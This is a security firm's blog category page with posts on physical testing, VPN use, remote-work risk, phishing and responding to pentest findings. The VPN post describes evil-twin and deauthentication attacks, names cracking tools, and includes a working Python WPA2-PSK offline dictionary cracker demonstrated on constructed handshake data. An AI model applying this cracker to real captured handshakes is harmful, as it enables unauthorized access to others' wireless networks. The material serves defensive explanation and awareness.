Category: Security Recommendations

  • Windows 10 Vulnerability Highlights Need for Physical Security Testing

    During our more advanced Red Team penetration testing attacks, Raxis customers are often shocked to discover that we’ve not only been inside their network, but we’ve also been inside their buildings, their server rooms, and even their individual offices. It would take days to explain all the tricks and techniques we use to do that, so let’s focus on the more important question of why we do it.

    The simple answer is that physical access to devices opens up a world of possibilities to an attacker. In fact, a recent Forbes article about a Windows 10 security problem offers an excellent example of what can happen when a bad guy gets to spend a few minutes alone with your computer.

    Notice in the article that Bjorn Ruytenberg says that a hacker with the right equipment needs less than five minutes of access to exploit the Windows 10 vulnerability… even if the computer is powered off. The attacker only needs physical access to the device. This is an important finding because 95% of the time when Raxis conducts a physical, social-engineering assessment, we succeed in gaining unchallenged physical access to facilities and devices – even when armed guards are employed. Security is often perception, and our techniques commonly bypass guards, electronic controls, and employees. We often find unattended workstations and usually find ourselves with these devices for far longer than the five minutes that Ruytenberg says it takes.

    What’s the takeaway? In the real world, cybersecurity must complement physical security. In other words, patch your Windows but don’t forget to lock your windows as well.

  • Notes From a Hacker: Yes, You Have to Use Your VPN – and Here’s Why

    Right now, across the globe, there are millions of exasperated IT helpdesk workers on the phone with an equal number of frustrated colleagues who are working from home, some for the very first time. I don’t have exact numbers, but I’m willing to bet that the most common issue they’re discussing is problems logging onto a company’s virtual private network (VPN). From my own experience, at least some of those end users (maybe you included) are asking, “Do we really have to do this?” 

    The answer is, yes, you do. And, because your IT team is likely overwhelmed right now, I’ll step in and share just a few reasons why a VPN helps keep your company safe from people like me.

    The most common threat you face on an unsecured WiFi network is a man-in-the-middle (MitM) attack, where a hacker inserts himself into the data stream between two endpoints. You’ve probably been cautioned about public WiFi – coffee shops, airports, etc. – for that very reason. Trust me, it works on your home network as well.

    A successful MitM attack allows a bad guy to intercept or modify data in transit, including credentials or financial information. In fact, most wireless attacks are perpetrated with the goal of acquiring MitM access to user data. A VPN encrypts your traffic between your device and the company network, so an attacker sitting on the WiFi sees only ciphertext and has a much harder time stealing anything useful.

    MitM is closely related to another threat known as the “Evil Twin” attack, sometimes referred to as a rogue access point, which exploits how wireless endpoints behave. When a phone, laptop, or tablet joins a wireless network, it remembers that network. From that point forward, the endpoint periodically sends out probe requests looking for it.

    Unfortunately for you, it’s easier than you think to trick your devices. We can use tools such as Mana or the WiFi Pineapple to answer those probes with a fake access point advertising the same network name. Your device will associate with it as though it were the legitimate network. From there we have a MitM and can intercept or modify data in flight, or even present a fake captive portal to capture credentials.

    Other tools help attackers go after wireless networks directly by sending de-authentication frames, which force devices off the network. When a device reconnects, it must re-authenticate, which on a WPA2 personal network means completing a four-way handshake. The PSK itself never crosses the air, but the handshake does carry nonces and a message integrity check computed from a key derived from the PSK, and that is enough: an attacker who captures the handshake can test candidate passphrases offline with tools such as Hashcat, with no further interaction with the network. If a guess reproduces the captured integrity check, the PSK has been recovered.

    The most widely used toolkit is the Aircrack-ng suite, which includes Airmon-ng for putting a wireless card into monitor mode, Airodump-ng for capturing wireless traffic and handshakes, Aireplay-ng for injecting packets (including de-authentication frames), and Aircrack-ng for cracking the PSK. Other tools such as WiFite offer a menu-driven interface that automates a wide variety of these attacks.
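    To make concrete why a captured handshake is enough for an offline attack, here is an added example written for this page, not Raxis code and not part of any of the tools named above. It implements the WPA2-PSK key derivation (PBKDF2 to the PMK, the 802.11 PRF to the PTK, HMAC-SHA1 over the EAPOL-Key frame for the MIC) and a dictionary attack against a handshake. The handshake values are constructed in-block as a stand-in for what Airodump-ng would record; the cracker only ever sees the public fields (SSID, MAC addresses, nonces, the EAPOL frame and its MIC), never the passphrase, and the SSID, MACs and wordlist are made up.

```python
"""Offline WPA2-PSK cracking from a four-way handshake (added example).
The handshake below is constructed for the demo; only fields that are
visible on the air are handed to the cracker."""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    # IEEE 802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || counter), 4 blocks
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4))
    return out[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # PTK = PRF-512(PMK, "Pairwise key expansion", min/max of the MACs and nonces)
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes) -> bytes:
    # Key descriptor version 2 (WPA2/AES): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]
    return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_psk(capture: dict, wordlist):
    """Test each candidate passphrase against the captured MIC and return the
    one that reproduces it, or None. Aircrack-ng and Hashcat (mode 22000)
    do exactly this, only far faster."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, capture["ssid"])
        ptk = derive_ptk(pmk, capture["ap_mac"], capture["sta_mac"],
                         capture["anonce"], capture["snonce"])
        kck = ptk[:16]  # first 128 bits of the PTK: the key confirmation key
        if hmac.compare_digest(eapol_mic(kck, capture["eapol"]), capture["mic"]):
            return candidate
    return None


def build_demo_capture(passphrase: str, ssid: str) -> dict:
    """Constructed stand-in for a real capture: computes the MIC the client
    would have sent in message 2 of the handshake. Everything returned is
    public on the air; the passphrase itself is not part of the result."""
    ap_mac = bytes.fromhex("001122334455")   # assumed addresses
    sta_mac = bytes.fromhex("66778899aabb")
    anonce = bytes(range(32))                # constructed nonces
    snonce = bytes(range(32, 64))
    # EAPOL-Key message 2 layout: 802.1X header (4), descriptor type (1),
    # key info (2), key length (2), replay counter (8), nonce (32), IV (16),
    # RSC (8), key ID (8), MIC (16), key data length (2). MIC field left zeroed.
    eapol = bytearray(99)
    eapol[0:2] = b"\x02\x03"                 # 802.1X v2, EAPOL-Key
    eapol[2:4] = (95).to_bytes(2, "big")     # body length
    eapol[4] = 0x02                          # RSN key descriptor
    eapol[5:7] = b"\x01\x0a"                 # key info: MIC | pairwise | version 2
    eapol[17:49] = snonce                    # SNonce carried in message 2
    eapol = bytes(eapol)
    ptk = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac,
            "anonce": anonce, "snonce": snonce, "eapol": eapol,
            "mic": eapol_mic(ptk[:16], eapol)}


# Constructed demo data: a home network with a weak passphrase and a tiny wordlist.
DEMO_CAPTURE = build_demo_capture("sunshine123", "HomeWiFi-2.4G")
WORDLIST = ["password", "12345678", "letmein!", "sunshine123", "Winter2020!"]

if __name__ == "__main__":
    print("Recovered PSK:", crack_psk(DEMO_CAPTURE, WORDLIST))
```

    The cost of the attack is one PBKDF2 run (4,096 SHA-1 rounds) per candidate, which is why a short dictionary word falls in seconds on a GPU while a long random passphrase does not; nothing in the loop ever touches the network again after the capture.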

    You may be thinking these tools are rare and hard to find, but that’s not the case. Both hardware and software are readily available and relatively cheap. They’re also very simple to set up and operate. 

    My point is that it can be relatively easy for a hacker to compromise your home WiFi. By contrast, your IT security team has a number of safeguards in place to protect you and the company’s network from the tools and tactics I described above. Extending that protection to those working remotely is the reason you have to use your VPN.

    Does that mean you can’t be hacked? Certainly not. But it does make my job a lot harder and it probably will cause me to move on – to another employee, another method of attack, or best case, another company.

    Preferably one that doesn’t use a VPN for remote workers.


  • Raxis COO Shares WFH Cybersecurity Tips on Columbus, Ohio’s Fox 28

    “Protect your data in the same way you protect your health.” That’s the main message our own Bonnie Smyre delivered today in an interview on Good Day Marketplace, a popular television show in the Columbus, Ohio area.

    Raxis COO, Bonnie Smyre, on Good Day Marketplace

    Bonnie explained to host Shawn Ireland and her audience that hackers and scammers know that Americans are worried about COVID-19 and are hungry for reliable information now. That’s why it’s important to only visit sites you know are safe and never click links inside unsolicited emails. She also talked about the importance of keeping personal information off your work devices.

    Bonnie cautioned that, even though slow Internet speeds can be frustrating, don’t disable spam and virus filtering or endpoint protection in hopes of speeding things up.

    Check out Bonnie’s full interview here: https://myfox28columbus.com/sponsored/good-day-marketplace/gdm-raxis-information-security

  • Remote Security Series: Protect Your Network Health Like Your Own

    Most of us understand by now (hopefully) that this COVID-19 emergency is not the time to take chances with our health and safety. The benefits of being disease free far outweigh the costs of some social distancing and extra diligence about hygiene. However, I’m worried that many companies don’t seem to make the connection between what they’re doing to protect their employees and what they should be doing to protect their data.

    That’s dangerous because hackers are heartless. In their world, COVID-19 doesn’t bring suffering and death; to them, it’s all about opportunity and wealth. Like a virus, they’re attacking the most vulnerable and leaving untold damage in their wake.

    Unfortunately, we’ve seen and heard about companies across America that are making hackers’ jobs easier. For example, the additional strain of accommodating remote workers has caused many IT departments to open ports and grant access that they would never allow normally.

    RDP, VPN, oh my!

    One common problem is companies exposing remote desktop protocol (RDP) directly to the internet, where it is a prime target for brute-force and credential attacks. Others have VPN configuration errors that slow network traffic, frustrate users, and put pressure on IT staff to relax security measures in order to improve productivity. And some are not monitoring or logging remote access traffic at all, so brute force attempts go unnoticed. Raxis is seeing this firsthand in many of the external and remote internal penetration tests we are currently conducting for our customers.

    Add to this the challenge of team members accessing the network with their home devices. Each one brings with it a high degree of risk that most office-based IT teams aren’t accustomed to managing at scale.

    The bad guys know all this, of course. That’s why we’ve seen a surge of attacks, many based on the COVID-19 emergency itself. Scammers know we’re scared, tired, and worried for ourselves and our loved ones. We’re more likely to click on a malicious link or reveal sensitive information – and less likely to have appropriate safeguards in place when we do.

    Where to start

    So, what’s the solution? Our previous posts in this series have talked about ways to make networks more resilient from a technological perspective. But this is also a time when IT pros have a responsibility to safeguard their company’s infrastructure and protect their employees. It’s up to you to make sure that productivity doesn’t come at the expense of security, even if that isn’t what your C-suite leaders or colleagues want to hear right now.

    The good news is that you don’t have to go it alone. Raxis experts can help you discover and document any unintended security consequences that come from your team working remotely. We can provide a fresh, hacker’s-eye evaluation of your perimeter defenses along with continual assessments to make sure they remain effective. We also offer many remote solutions that go hand in hand with the new workplace guidelines for many of our customers.

    Just as the coronavirus has made us more careful about our physical health, the resulting work-from-home experience should make us much more conscious of our cybersecurity posture. Give us a call and let’s talk about how Raxis can help you emerge from this crisis more secure and more confident about working remotely.

    Contact Raxis for more information.

    Want to learn more? Take a look at the first part of our Remote Security Series.

  • Remote Security Series: Urgent Questions You’ll Face About VPN and Remote Access

     As the coronavirus has pushed almost all of the workforce remote, IT teams have been very busy making networks accessible in ways they weren’t previously. Most organizations plan for a consistent number of users remotely accessing the network. I doubt any planned for a nearly global work-from-home (WFH) event like COVID-19. 

    As a result, I’ve worked with a few companies to help implement some very last-minute WFH solutions. I came away with a better understanding that there are some critical questions companies need to be asking (and answering) right now. 

    Do you have enough VPN licenses? Imagine being told on a Friday afternoon that everyone will be working from home for the foreseeable future. One company’s VPN was licensed for 100 users but had over 250 working remotely. Their immediate answer was to open up remote desktop ports for each user’s office computer. Bad idea, especially considering a few passwords were very insecure, including “Winter2020!” and “Corona2020$.” 

    Do you have enough bandwidth? Like VPN licenses, most companies have plenty of bandwidth to handle office data and the normal load of remote users with no issues. But with everyone working from home and many streaming media, this can cause a lot of strain on your network and lead to performance issues and outages.  

    Is split tunneling appropriate for your company? In many cases, split tunneling is a great way to address the bandwidth issue. The trade-off is that only traffic bound for the company network goes through the encrypted VPN tunnel; everything else leaves the endpoint directly over the user’s home connection. This can lead to data being mishandled, so make sure you have safeguards in place to prevent that. It is also a good idea to block streaming services through the VPN tunnel or with an endpoint protection product.

    Are your users trained to use the VPN? With the rush to get users set up, users who worked in the office every day are now trying to do the same type of work from home. This may be painfully slow if they are accustomed to 1000 Mbps in the office and get only 50 Mbps at home. Their fix will be to download files locally, work on them, and then upload them back when done (we hope). That raises a couple of other important questions…

    Do they delete sensitive data from their computers when they are done?  Do they even know they should do this? If there’s even a speck of doubt, I strongly recommend putting data loss prevention (DLP) tools on the endpoints to ensure data isn’t leaving the network unsecured.

    Do you have a ‘shadow IT’ problem you didn’t know about? Here’s an interesting issue I ran into recently: A company realized there were employees who had been working remotely for years, but who didn’t know how to use the VPN to access files they need on a daily basis. I decided they either have integrity challenges, or they have unauthorized side channels they may not know about. Let’s set aside the ethics issue and assume you suspect the latter. Now would be a good time to start monitoring traffic going out to popular file sharing services. In an incident response situation, these services create more areas to audit, and your price tag and scope just increased a lot. Imagine thinking you have 10 servers and 400 workstations to check and then adding every Dropbox, Box.net, Sync and OneDrive account and folder. 

    Is your VPN being monitored or logged, and how many concurrent connections do you allow per user? This matters if a user’s credentials are compromised: with unlimited connections per account, an attacker can sit on your network alongside the legitimate user and go unnoticed. Limit concurrent sessions, alert when one account is connected from two locations at once, and enforce MFA on your remote access solution so that a stolen password alone is not enough.

    Are user endpoints encrypted and patched? Your end users are now working on home networks that may have default passwords and weak wireless security, which you probably can’t control. It is very important, then, that you harden everything you do control. Once your WFH solutions are in place, make sure you remember to audit their security. Don’t let a rush to get users working remotely lead to costly misconfigurations and data breaches — just because they click a malicious COVID-19 update or decide to watch cat videos.

    Does your business continuity plan reflect the new reality? Remote access to critical data should be a part of your business continuity plan. Being surprised by a hard limit of users on your VPN appliance can lead to a rush to provide accessibility, which in turn can lead to bad security decisions. Testing this plan will also show you areas that need to be addressed or that would be much easier to handle if you had known ahead of time. Also, ensure you have an updated remote access and VPN policy in place. Your end users will not always make smart security decisions, so ensure that they have a document to reference.

     The coronavirus emergency is putting all of us to the test, but especially the IT teams who shoulder the responsibility for keeping a remote workforce secure and productive. Make sure you have good answers to these questions and, if you need help, remember we are here for you.

     Raxis is always happy to discuss your unique circumstances and to offer options specific for your needs as well as your budget.

    Contact Raxis for more information.

     Want to learn more? Take a look at the next part of our Remote Security Series.

  • Remote Security Series: Review Remote Workforce Policies

    The coronavirus emergency has made it clear that some companies are ready for the new work-from-home (WFH) reality, with mature and tested policies for managing remote business workflows. Others were caught off-guard and now find themselves developing and refining their procedures even as they’re being implemented.

    Especially in times of crisis, we humans need structure, boundaries, and clear guidance to help us feel secure and remain productive. So much so that we’ll create our own in the absence of any guidance. And while a little flexibility is a good thing, remote work brings technology and cybersecurity challenges that demand clear, relevant, and effective policies to protect the company’s network.

    Turning the problem into an opportunity

    Though most companies are now facing the radical shift to a remote workforce, the smart ones are using this emergency as an opportunity to review and update their remote work policies. Even for those that have transitioned smoothly to WFH, the scale of this change makes it prudent to double check the security posture of their teams. Those that do will find more ways to make their operations more secure and efficient; those that don’t may become corporate casualties of the coronavirus.

    Safeguarding sensitive data

    One of the biggest security issues for businesses is handling sensitive data like Social Security, credit card, or bank account numbers. Do you have procedures in place to make sure that information can be sent and received securely? Take a close look at how sensitive data flows across your newly extended network boundaries. Make sure you’ve accounted for identity management, client information, and any type of financial disclosure or payment.

    Like a rubber band, your network perimeter thins as it expands. Remote workers are at a heightened risk of direct attacks against their personal data. Emphasize the importance of documented policies regarding internal communications. Some examples might include never asking for passwords, verifying critical or sensitive requests, and MFA support.

    Business continuity processes (you do have them, don’t you?) no longer enjoy the luxury of encompassing a small number of sites. They now must accommodate an increasingly dynamic footprint of inputs from remote workers. Use this experience to update them to include such things as better internal communications, more productivity checkpoints, remote device wipe, and alternate contact information for remote workers.

    Include guidance about the personal use of business assets and make sure your VPN enforces a minimum level of security compliance before authorizing network connections. That should include requiring the use of company devices, keeping your endpoint protection up to date, and making sure any necessary agents are installed.

    In addition, you should enforce MFA on all systems that connect to network resources. Implementing MFA requires planning, but it offers much more robust security at the perimeters.

    All of these efforts are important, but they’re doomed unless you also have an effective way to let your workers know about them. Now is the time to communicate more frequently about security and be on guard against targeted attacks like phishing and spear-phishing. Not sure about that email? Don’t open it. Hold off on sending hyperlinks so that any links received stand out for additional scrutiny.

    Where to start

    These are just a few of the ways you can make sure your business turns the problems you face with remote work into opportunities to make the experience more effective for your company and your team.

    If you need more help or want experts to help you transition to WFH, Raxis offers thorough security reviews and guidance on Teleworking, Security, and Business Continuity / Disaster Recovery (BC/DR) policies.

    Contact Raxis today for more information.

    Want to learn more? Take a look at the next part of our Remote Security Series.

  • Remote Security Series: Stay ahead of the phishing attacks that follow COVID-19

    In these uncertain times, many companies are allowing employees to work from home more than ever before. Essential personnel onsite at the workplace are kept to a minimum and are offered remote support when issues occur. The scope of remote work is unprecedented and brings up a lot of questions for managers aiming to support their employees.

    This series will discuss security testing and consulting options that Raxis offers to help companies work as securely as possible while employees work from home using home wireless services and systems or jump on the company VPN in unprecedented numbers.

    Phishing

    Raxis expects a rise in phishing attempts — emails, texts & phone calls — as attackers realize that employees are at home and not as easily able to verify that requests are legitimate.

    Let’s start with your VPN itself. It’s likely at least a few of your team members are going to have problems logging on. Though they may be overwhelmed, your help desk workers are inclined to be helpful. Verification is a step that might easily be skipped in a rush to get an exec or senior manager online.

    Finance is another point of vulnerability. Say that you receive an email from your boss saying to approve a new vendor payment. Normally your boss would never send that in an email . . . but these are not normal times, and you’re both working from home. You think of giving her a call, but she just told you she’s busy setting up her children’s new online school meeting. Do you approve the request? How are you sure that it’s legitimate?

    What if it was a phone request from a customer who is working from home? He’s on his cell phone. Are you sure it’s really him? Should you verify before telling him customer financial information? Sure you should, but you’re out of your normal environment and he sounds really annoyed. What do you do?

    And what about your teammates? Your employee texts you and asks for the password to an old system with a shared password. Do you text them back? Do you check the number first? Send it in email?

    These are different questions than you ask when you’re in the office and can lean over the cube wall. It pays to make sure all your employees know the answers (or at least ask the questions) before they face them in the real world from home.

    Where to start

    Raxis has a number of phishing tests that fit these scenarios, and we are happy to work with you to customize a test that fits your needs. We provide a report and a debriefing call to help you educate your employees with real world examples. Whether they pass or fail, it’s an opportunity to safely assess their readiness and reinforce their training.

    Take a look at our social engineering offerings. As always, Raxis is happy to advise you and work with you to customize a test that meets your needs. If you have concerns, we’d be happy to chat with you about options that work for you.

    Contact Raxis today for more information.

    Want to learn more? Take a look at the next part of our Remote Security Series.

  • Helping Nonprofits and Other Growing Businesses Understand Security Risks

    I’m excited that NTEN, the Nonprofit Technology Network with more than 50,000 community members, invited me to be a guest blogger this week.

    It’s important that nonprofits avoid the mindset that leaves so many businesses vulnerable. Specifically, I’m talking about the idea that they are too small or have too little money to be of interest to scammers, hackers, and other cyber criminals. The truth is that the bad guys often don’t discriminate, and you may have something they want more than money.

    For example, if you keep detailed donor records, that personally identifiable information (PII) might be devastating in the wrong hands. A skilled hacker or social engineer can do a lot with names, email addresses, and phone numbers alone. Add in Social Security numbers or bank account information, and you may be sitting on a gold mine for a malicious actor.

    Some of today’s most serious threats are driven by political goals more than financial interests. In many cases, these are well-financed state-sponsored attacks, and your organization may have data that can help them breach a government agency’s security or social engineer their way into a large corporation.

    And forget about hackers leaving you alone because of your mission. After my years in the cybersecurity sector, I’m no longer shocked at how low some of these black hats will go. We’ve seen hospitals and health care organizations, charities, churches, schools, and other do-good groups fall prey.

    The saddest part is knowing that some of these attacks were successful for the very reasons the organizations thought they would never happen. To a hacker, the idea that you’re too small to notice may mean they see you as an easy target, even if you’re only one step toward their larger goal.

    If you’re a nonprofit leader, board member, or even a volunteer, please take a moment to check out the article above. You may find some nuggets that will help you help your organization avoid a breach. And that may be the most important contribution you can make to your favorite cause.

  • Top Five Actions NOT to Take When Your Pentest Results are High Risk

    Monday Morning Voicemail:

    Good morning high-powered CSO, this is Brian with Raxis. I sent over a draft of the most recent assessment report as you requested. Just to recap, there were seven critical findings, five severe, and a menagerie of others that we can discuss at your convenience.

    You’re the CSO of a major enterprise. You’ve hired us to perform a penetration test, and the results aren’t pretty. What now?

    The team at Raxis brings a rich depth of experience in articulating risk to all audiences. We can talk technical with the engineering groups and discuss strategy with C-level executives. It’s how someone deals with adversity that defines them as a leader. We’ve seen leaders emerge from the fire to rise above the fray. We’ve also witnessed the fallout when leadership decisions are made in ignorance or for political expediency.

    A security assessment is only one step in a process, and its value is largely determined by what happens after we’ve delivered the report. So, there you are; you have an unexpectedly thick and verbose penetration test report sitting in your inbox. Here are the five worst things you can do, based on what we’ve seen happen in the real world.

    5. Sweep it Under the Rug

    It may be tempting to just quietly file that report away because you think it might tarnish your reputation or because, “that only happens to other companies.” Maybe you would prefer to fix the findings with minimal political overhead. Here’s the problem. The report you received is a bona fide disclosure of risk. When it landed in your inbox, any plausible deniability left the building. If you do anything less than boldly embrace it, and the company is breached, you are going to be in a rough spot with tough questions to answer. By owning the problem, you can own the resolution. Let that be the focus.

    4. Play the “Blame Game”

    It is easy in the world of corporate culture to get bogged down in political maneuvering.  A corporate leadership role requires a certain level of posturing, but there are few things less productive than finger pointing. The fact that you were against rolling out the vulnerable application or platform that was compromised may carry weight in your inner circle of colleagues, but your stockholders only want to know their investment has underlying value and that effective leadership is at the helm. It’s helpful to acknowledge mistakes and learn from them, but keep the emphasis on moving forward.

    3. Cling to Penny Wise and Pound Foolish Remediations

    The findings in the assessment report are not a checklist to tick off before calling it a day. Yes, of course they should be fixed, but it’s critical to understand that a penetration test is opportunistic. The findings that are presented are probably not the only significant exposure. Look at the bigger story that they tell and formulate remediations at a systemic level. Were all the findings related to applications? If so, the problem probably is not the applications themselves but more likely their development and deployment process. Yes, fix the symptom, but do not neglect the underlying problems that led to it.

    2. Rain Down Fire and Wrath

    We see this far too often. A phishing email is sent out, and an employee clicks on the link, which then becomes the bridgehead for a compromise. When the report is delivered, specific individuals are identified as the source of the compromise and are promptly fired. That is absolutely the wrong course of action. Look at it this way. Once they understand the ramifications of their action, that person is the most secure person in the company at that moment. It’s likely that they will continue to operate under a heightened level of vigilance and will be the last person to click on a suspicious link in the future. Replacing them with someone who has not learned that lesson simply presses the reset button for future phishing attacks. Help them understand the attack and how their actions contributed, and they may become a powerful advocate among their peers for better security.

    1. Silo Solutions

    Would a capable attacker limit themselves to a single application, network, or technology? The answer, of course, is that they would not. Lateral movement is a huge component of privilege escalation. It’s important to scrutinize specific elements of any environment. We conduct assessments regularly against a single application or system, but what we always try to underscore is that attacks are rarely vertical. Rather, the attack chain tends to zigzag across technologies and business units within an organization. Just because you tested and remediated a specific web application does not mean that the app no longer presents a risk. It means that the direct exposure created by the app has been mitigated. Maybe there is another vulnerable application running on the same server that can be used as a point of compromise?

    The point is that attackers do not silo their efforts, so don’t silo your defenses.

    Your Decisions Make the Difference

    Fortunately, these observations are more the exception than the rule, but they do happen. And they happen in surprisingly large and mature organizations. Most of these mistakes can be attributed to a knee-jerk moment of self-preservation. When our lizard brain steps in, sometimes we don’t make the best decisions for our career. The best way to avoid these pitfalls is to never put yourself in that situation in the first place. Yes, some pentests are horrific. In leadership, it’s not how you fall. It’s how you rise above.

    A security assessment is not a chance for someone to make you look bad. It’s a learning exercise. Embrace it and use it as a platform from which to build positive change.

    Raxis CTO, Brian Tant